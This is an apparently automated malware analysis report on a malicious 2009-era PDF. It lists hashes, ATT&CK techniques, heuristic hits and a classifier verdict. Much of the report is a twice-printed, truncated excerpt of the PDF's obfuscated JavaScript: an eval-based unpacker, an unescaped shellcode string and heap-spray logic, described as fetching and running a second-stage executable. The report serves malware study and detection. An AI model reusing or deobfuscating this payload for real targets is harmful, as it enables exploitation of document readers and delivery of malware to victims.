PDF malware analysis — malicious · 7c448496cc4fe21c

MALICIOUS

PDF

10.2 KB Created: 2009-04-08 16:02:46 Authoring application: OVKBweNzJdVBhYWFmSI (via WWQWVCBSFCEaalSZGV)

MD5: 2e3caaf00e564dd47f6c0c5ced19797f SHA-1: 2a53766cd00cd4f60727263db8c8c49e870c2154 SHA-256: 7c448496cc4fe21cbe71ba501f083ebab43a4776711735107be1515c89b4a229

116 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF contains embedded JavaScript, flagged as a PDF JavaScript exploit cluster, which is designed to download and execute a second-stage payload. The script attempts to obfuscate its actions but ultimately constructs a URL to fetch a malicious executable. The ML classifier strongly indicates maliciousness, and the presence of JavaScript points to T1059.007.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0007_000.js
3a08a6717b23e14516e9256dd33a207198d6a716d749f10a4ae2d207861d4666 pdf-javascript-stream PDF /JS object 7 at offset 0x55D 8303 bytes

Filename	Kind	Source	Size
`javascript_obj0007_000.js` `3a08a6717b23e14516e9256dd33a207198d6a716d749f10a4ae2d207861d4666`	pdf-javascript-stream	PDF /JS object 7 at offset 0x55D	8303 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script function eLwXfgx3l(kznKCxHAKH){ return eval(kznKCxHAKH);} ngaaGsTDk9 =733181;for(bcDrsLkQp=1; bcDrsLkQp>2; bcDrsLkQp++){ ngaaGsTDk9++;} eLwXfgx3l(function(l,a,z,k,e,d){e=function(z){return(z<a?'':e(parseInt(z/a)))+((z=z%a)>35?String.fromCharCode(z+29):z.toString(36))};while(z--){if(k[z]){l=l.replace(new RegExp('\\b'+e(z)+'\\b','g'),k[z])}}return l}('k I=3J.3K.3E();I=I.3y(/\\D/g,"");3C(I.1h(0)=="8"&&I.1h(1)<="1"&&I.1h(2)<="2"){1n=F("%3B"+"0%1i"+"51%U"+"3O%u"+"3P%"+"21"+"%r"+"0%41"+"l%1s"+"44%u"+"46%"+"2e"+"%3Z"+"3%3Q"+"30%W"+"3X%u"+"35%"+"1r"+"%3q"+"c%3s"+"8b%1s"+"3k%u"+"3m%"+"2d"+"%3h"+"d%3i"+"7c%X"+"3j%u"+"3l%"+"2f"+"%r"+"1%1m"+"l%1j"+"3p%u"+"3o%"+"h"+"%2X"+"1%39"+"59%j"+"O%u"+"56%"+"1J"+"%2I"+"a%1a"+"2E%j"+"O%u"+"5h%"+"15"+"%r"+"0%4Z"+"l%Q"+"4Y%u"+"5y%"+"v"+"%2I"+"a%1a"+"2E%j"+"O%u"+"5B%"+"10"+"%5A"+"2%5u"+"5n%j"+"5m%u"+"A%"+"Z"+"%5l"+"0%5k"+"5o%X"+"5p%u"+"5s%"+"16"+"%5r"+"4%5q"+"l%W"+"4Q%u"+"4P%"+"p"+"%4o"+"0%4n"+"4m%j"+"4l%u"+"A%"+"w"+"%2G"+"1%B"+"50%j"+"o%u"+"4p%"+"K"+"%1G"+"6%m"+"l%j"+"14%u"+"2n%"+"w"+"%2G"+"1%1m"+"5e%j"+"o%u"+"4q%"+"q"+"%4t"+"2%m"+"4s%U"+"2O%u"+"2n%"+"1p"+"%4a"+"a%4i"+"89%22"+"4g%u"+"4u%"+"h"+"%4J"+"2%4H"+"2Q%j"+"O%u"+"1k%"+"q"+"%2R"+"2%m"+"19%U"+"2O%u"+"4z%"+"h"+"%4y"+"0%4E"+"2Q%j"+"O%u"+"1k%"+"q"+"%2R"+"2%m"+"19%X"+"4C%u"+"4D%"+"13"+"%4B"+"c%B"+"6e%j"+"o%u"+"4A%"+"12"+"%4w"+"6%4x"+"1c%1s"+"4F%u"+"4G%"+"17"+"%4M"+"0%4N"+"4O%Q"+"4L%u"+"1R%"+"z"+"%4K"+"f%1m"+"52%j"+"o%u"+"1H%"+"t"+"%4I"+"0%m"+"l%U"+"4v%u"+"4h%"+"1q"+"%r"+"0%m"+"6a%j"+"14%u"+"1H%"+"t"+"%1G"+"e%m"+"l%W"+"4f%u"+"4e%"+"2j"+"%r"+"2%1i"+"l%j"+"14%u"+"4b%"+"1l"+"%4c"+"9%4d"+"81%j"+"4j%u"+"A%"+"18"+"%4k"+"5%m"+"19%1Y"+"4r%u"+"5t%"+"1E"+"%5C"+"9%5z"+"58%j"+"o%u"+"A%"+"h"+"%r"+"0%m"+"l%j"+"o%u"+"A%"+"h"+"%5v"+"7%1V"+"74%M"+"5w%u"+"5x%"+"2k"+"%5j"+"8%1D"+"l%M"+"5i%u"+"4X%"+"1F"+"%4W"+"2%4V"+"72%j"+"4R%u"+"4S%"+"1B"+"%1Z"+"2%4T"+"63%M"+"4U%u"+"49%"+"1u"+"%53"+"0%54"+"69%C"+"5f%u"+"5g%"+"1w"+"%5d"+"9%5c"+"89%22"+"5a%u"+"5b%"+"1v"+"%5D"+"7%1S"+"3Y%1j"+"37%u"+"31%"+"h"+"%1N"+"3%B"+"1b%j"+"o%u"+"1X%"+"N"+"%36"+"b%m"+"l%C"+"3n%u"+"3a%"+"1x"+"%1N"+"3%B"+"1b%j"+"o%u"+"3r%"+"1A"+"%r"+"0%3c"+"3b%3g"+"3d%u"+"1R%"+"1z"+"%3t"+"d%2Z"+"85%j"+"1T%u"+"2Y%"+"2S"+"%1U"+"3%B"+"1b%j"+"o%u"+"32%"+"2V"+"%38"+"d%33"+"34%j"+"2W%u"+"A%"+"2N"+"%3e"+"9%48"+"51%3V"+"3W%u"+"3U%"+"2U"+"%3T"+"3%1a"+"3R%3S"+"3u%u"+"45%"+"2s"+"%r"+"2%1S"+"l%1Y"+"47%u"+"1X%"+"2w"+"%43"+"2%40"+"85%j"+"1T%u"+"1k%"+"2o"+"%1U"+"3%B"+"1b%j"+"o%u"+"42%"+"2p"+"%r"+"0%m"+"l%j"+"o%u"+"A%"+"h"+"%r"+"0%m"+"l%W"+"3D%u"+"3A%"+"p"+"%3z"+"0%3v"+"57%3w"+"3x%u"+"3F%"+"2H"+"%3L"+"b%3M"+"3N%1j"+"3G%u"+"3H%"+"2J"+"%3I"+"3%1D"+"52%Q"+"8q%u"+"8r%"+"2A"+"%8s"+"c%1i"+"55%Q"+"8E%u"+"7G%"+"2C"+"%7y"+"f%1V"+"64%Q"+"7x%u"+"7D%"+"2z"+"%7O"+"0%83"+"64%C"+"7Z%u"+"7Y%"+"2F"+"%7S"+"5%1W"+"63%C"+"7V%u"+"7W%"+"2T"+"%7X"+"0%7U"+"68%C"+"7T%u"+"7Q%"+"2P"+"%7R"+"9%1W"+"65%M"+"87%u"+"8a%"+"2M"+"%1Z"+"4%86"+"73%C"+"84%u"+"80%"+"2L"+"%82"+"e%7P"+"6e%M"+"7B%u"+"7C%"+"2B"+"%5E"+"8%7A"+"3f%X"+"7w%u"+"7E%"+"2y"+"");k y=F("%7F"+"a%7L"+"7M"+"");k J=20+1n.x;Y(y.x<J)y+=y;k 1M=y.1t(0,J);k E=y.1t(0,y.x-J);Y(E.x+J<7N)E=E+E+1M;k 1L=1Q 1P();1d(R=0;R<7K;R++){1L[R]=E+1n}k 1O="7J"+"1K"+"1K"+"8d"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"88"+"";7H.7I("%8c",1O)}8j{k 2t=1Q 1P();8I 2m(n,P){Y(n.x*2<P){n+=n}n=n.1t(0,P/2);8G n}k 2q=8D;k 1e=F("%8A"+"%8B"+"%2c"+"%8C"+"%21"+"%h"+"%8z"+"%8H"+"%8F"+"%2e"+"%8y"+"%8w"+"%8x"+"%8k"+"%1r"+"%8l"+"%8i"+"%8h"+"%8e"+"%2d"+"%8f"+"%8g"+"%8m"+"%2c"+"%2f"+"%s"+"%8n"+"%8t"+"%8u"+"%h"+"%8v"+"%8o"+"%s"+"%8p"+"%1J"+"%q"+"%V"+"%s"+"%z"+"%15"+"%h"+"%2i"+"%2h"+"%s"+"%v"+"%q"+"%V"+"%s"+"%1o"+"%10"+"%13"+"%2b"+"%7z"+"%h"+"%Z"+"%12"+"%2a"+"%25"+"%24"+"%16"+"%17"+"%v"+"%q"+"%23"+"%p"+"%z"+"%K"+"%26"+"%h"+"%w"+"%t"+"%27"+"%h"+"%29"+"%K"+"%1q"+"%h"+"%H"+"%H"+"%w"+"%t"+"%S"+"%h"+"%28"+"%q"+"%7u"+"%p"+"%z"+"%H"+"%1p"+"%1l"+"%w"+"%t"+"%S"+"%h"+"%18"+"%1I"+"%s"+"%v"+"%q"+"%V"+"%s"+"%z"+"%15"+"%h"+"%2i"+"%2h"+"%s"+"%v"+"%q"+"%V"+"%s"+"%1o"+"%10"+"%13"+"%2b"+"%6j"+"%h"+"%Z"+"%12"+"%2a"+"%25"+"%24"+"%16"+" ... (truncated)

Detection

ClamAV: No threats found

Obfuscation or payload: likely

Carved artifact contains 2 eval/decoder/string-building token(s).

Preview script

First 1,000 lines of the extracted script

function eLwXfgx3l(kznKCxHAKH){ return eval(kznKCxHAKH);}
ngaaGsTDk9 =733181;for(bcDrsLkQp=1; bcDrsLkQp>2; bcDrsLkQp++){ ngaaGsTDk9++;}
eLwXfgx3l(function(l,a,z,k,e,d){e=function(z){return(z<a?'':e(parseInt(z/a)))+((z=z%a)>35?String.fromCharCode(z+29):z.toString(36))};while(z--){if(k[z]){l=l.replace(new RegExp('\\b'+e(z)+'\\b','g'),k[z])}}return l}('k I=3J.3K.3E();I=I.3y(/\\D/g,"");3C(I.1h(0)=="8"&&I.1h(1)<="1"&&I.1h(2)<="2"){1n=F("%3B"+"0%1i"+"51%U"+"3O%u"+"3P%"+"21"+"%r"+"0%41"+"l%1s"+"44%u"+"46%"+"2e"+"%3Z"+"3%3Q"+"30%W"+"3X%u"+"35%"+"1r"+"%3q"+"c%3s"+"8b%1s"+"3k%u"+"3m%"+"2d"+"%3h"+"d%3i"+"7c%X"+"3j%u"+"3l%"+"2f"+"%r"+"1%1m"+"l%1j"+"3p%u"+"3o%"+"h"+"%2X"+"1%39"+"59%j"+"O%u"+"56%"+"1J"+"%2I"+"a%1a"+"2E%j"+"O%u"+"5h%"+"15"+"%r"+"0%4Z"+"l%Q"+"4Y%u"+"5y%"+"v"+"%2I"+"a%1a"+"2E%j"+"O%u"+"5B%"+"10"+"%5A"+"2%5u"+"5n%j"+"5m%u"+"A%"+"Z"+"%5l"+"0%5k"+"5o%X"+"5p%u"+"5s%"+"16"+"%5r"+"4%5q"+"l%W"+"4Q%u"+"4P%"+"p"+"%4o"+"0%4n"+"4m%j"+"4l%u"+"A%"+"w"+"%2G"+"1%B"+"50%j"+"o%u"+"4p%"+"K"+"%1G"+"6%m"+"l%j"+"14%u"+"2n%"+"w"+"%2G"+"1%1m"+"5e%j"+"o%u"+"4q%"+"q"+"%4t"+"2%m"+"4s%U"+"2O%u"+"2n%"+"1p"+"%4a"+"a%4i"+"89%22"+"4g%u"+"4u%"+"h"+"%4J"+"2%4H"+"2Q%j"+"O%u"+"1k%"+"q"+"%2R"+"2%m"+"19%U"+"2O%u"+"4z%"+"h"+"%4y"+"0%4E"+"2Q%j"+"O%u"+"1k%"+"q"+"%2R"+"2%m"+"19%X"+"4C%u"+"4D%"+"13"+"%4B"+"c%B"+"6e%j"+"o%u"+"4A%"+"12"+"%4w"+"6%4x"+"1c%1s"+"4F%u"+"4G%"+"17"+"%4M"+"0%4N"+"4O%Q"+"4L%u"+"1R%"+"z"+"%4K"+"f%1m"+"52%j"+"o%u"+"1H%"+"t"+"%4I"+"0%m"+"l%U"+"4v%u"+"4h%"+"1q"+"%r"+"0%m"+"6a%j"+"14%u"+"1H%"+"t"+"%1G"+"e%m"+"l%W"+"4f%u"+"4e%"+"2j"+"%r"+"2%1i"+"l%j"+"14%u"+"4b%"+"1l"+"%4c"+"9%4d"+"81%j"+"4j%u"+"A%"+"18"+"%4k"+"5%m"+"19%1Y"+"4r%u"+"5t%"+"1E"+"%5C"+"9%5z"+"58%j"+"o%u"+"A%"+"h"+"%r"+"0%m"+"l%j"+"o%u"+"A%"+"h"+"%5v"+"7%1V"+"74%M"+"5w%u"+"5x%"+"2k"+"%5j"+"8%1D"+"l%M"+"5i%u"+"4X%"+"1F"+"%4W"+"2%4V"+"72%j"+"4R%u"+"4S%"+"1B"+"%1Z"+"2%4T"+"63%M"+"4U%u"+"49%"+"1u"+"%53"+"0%54"+"69%C"+"5f%u"+"5g%"+"1w"+"%5d"+"9%5c"+"89%22"+"5a%u"+"5b%"+"1v"+"%5D"+"7%1S"+"3Y%1j"+"37%u"+"31%"+"h"+"%1N"+"3%B"+"1b%j"+"o%u"+"1X%"+"N"+"%36"+"b%m"+"l%C"+"3n%u"+"3a%"+"1x"+"%1N"+"3%B"+"1b%j"+"o%u"+"3r%"+"1A"+"%r"+"0%3c"+"3b%3g"+"3d%u"+"1R%"+"1z"+"%3t"+"d%2Z"+"85%j"+"1T%u"+"2Y%"+"2S"+"%1U"+"3%B"+"1b%j"+"o%u"+"32%"+"2V"+"%38"+"d%33"+"34%j"+"2W%u"+"A%"+"2N"+"%3e"+"9%48"+"51%3V"+"3W%u"+"3U%"+"2U"+"%3T"+"3%1a"+"3R%3S"+"3u%u"+"45%"+"2s"+"%r"+"2%1S"+"l%1Y"+"47%u"+"1X%"+"2w"+"%43"+"2%40"+"85%j"+"1T%u"+"1k%"+"2o"+"%1U"+"3%B"+"1b%j"+"o%u"+"42%"+"2p"+"%r"+"0%m"+"l%j"+"o%u"+"A%"+"h"+"%r"+"0%m"+"l%W"+"3D%u"+"3A%"+"p"+"%3z"+"0%3v"+"57%3w"+"3x%u"+"3F%"+"2H"+"%3L"+"b%3M"+"3N%1j"+"3G%u"+"3H%"+"2J"+"%3I"+"3%1D"+"52%Q"+"8q%u"+"8r%"+"2A"+"%8s"+"c%1i"+"55%Q"+"8E%u"+"7G%"+"2C"+"%7y"+"f%1V"+"64%Q"+"7x%u"+"7D%"+"2z"+"%7O"+"0%83"+"64%C"+"7Z%u"+"7Y%"+"2F"+"%7S"+"5%1W"+"63%C"+"7V%u"+"7W%"+"2T"+"%7X"+"0%7U"+"68%C"+"7T%u"+"7Q%"+"2P"+"%7R"+"9%1W"+"65%M"+"87%u"+"8a%"+"2M"+"%1Z"+"4%86"+"73%C"+"84%u"+"80%"+"2L"+"%82"+"e%7P"+"6e%M"+"7B%u"+"7C%"+"2B"+"%5E"+"8%7A"+"3f%X"+"7w%u"+"7E%"+"2y"+"");k y=F("%7F"+"a%7L"+"7M"+"");k J=20+1n.x;Y(y.x<J)y+=y;k 1M=y.1t(0,J);k E=y.1t(0,y.x-J);Y(E.x+J<7N)E=E+E+1M;k 1L=1Q 1P();1d(R=0;R<7K;R++){1L[R]=E+1n}k 1O="7J"+"1K"+"1K"+"8d"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"88"+"";7H.7I("%8c",1O)}8j{k 2t=1Q 1P();8I 2m(n,P){Y(n.x*2<P){n+=n}n=n.1t(0,P/2);8G n}k 2q=8D;k 1e=F("%8A"+"%8B"+"%2c"+"%8C"+"%21"+"%h"+"%8z"+"%8H"+"%8F"+"%2e"+"%8y"+"%8w"+"%8x"+"%8k"+"%1r"+"%8l"+"%8i"+"%8h"+"%8e"+"%2d"+"%8f"+"%8g"+"%8m"+"%2c"+"%2f"+"%s"+"%8n"+"%8t"+"%8u"+"%h"+"%8v"+"%8o"+"%s"+"%8p"+"%1J"+"%q"+"%V"+"%s"+"%z"+"%15"+"%h"+"%2i"+"%2h"+"%s"+"%v"+"%q"+"%V"+"%s"+"%1o"+"%10"+"%13"+"%2b"+"%7z"+"%h"+"%Z"+"%12"+"%2a"+"%25"+"%24"+"%16"+"%17"+"%v"+"%q"+"%23"+"%p"+"%z"+"%K"+"%26"+"%h"+"%w"+"%t"+"%27"+"%h"+"%29"+"%K"+"%1q"+"%h"+"%H"+"%H"+"%w"+"%t"+"%S"+"%h"+"%28"+"%q"+"%7u"+"%p"+"%z"+"%H"+"%1p"+"%1l"+"%w"+"%t"+"%S"+"%h"+"%18"+"%1I"+"%s"+"%v"+"%q"+"%V"+"%s"+"%z"+"%15"+"%h"+"%2i"+"%2h"+"%s"+"%v"+"%q"+"%V"+"%s"+"%1o"+"%10"+"%13"+"%2b"+"%6j"+"%h"+"%Z"+"%12"+"%2a"+"%25"+"%24"+"%16"+"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.